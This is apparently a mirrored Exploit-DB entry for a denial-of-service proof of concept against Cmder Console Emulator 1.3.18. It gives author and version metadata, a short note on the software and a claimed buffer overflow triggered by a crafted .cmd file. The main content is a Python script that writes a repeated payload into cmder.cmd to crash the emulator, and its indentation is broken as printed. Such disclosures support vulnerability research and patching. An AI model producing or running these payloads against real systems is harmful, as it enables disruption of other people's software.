Cmder Console Emulator 1.3.18 – ‘Cmder.exe’ Denial of Service (PoC)

  • 作者: Aryan Chehreghani
    日期: 2021-10-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50401/
  • # Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
    # Date: 2021-10-07
    # Exploit Author: Aryan Chehreghani
    # Vendor Homepage: https://cmder.net
    # Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
    # Version: v1.3.18
    # Tested on: Windows 10 
    
    # [About - Cmder Console Emulator] :
    
    #Cmder is a software package created over absence of usable console emulator on Windows.
    #It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
    
    # [Security Issue] : 
    
    #equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. 
    #E.gλ cmder.cmd
    
    # [POC] :
    
    PAYLOAD=chr(235) + "\\CMDER"
    PAYLOAD = PAYLOAD * 3000
    with open("cmder.cmd", "w") as f:
    f.write(PAYLOAD)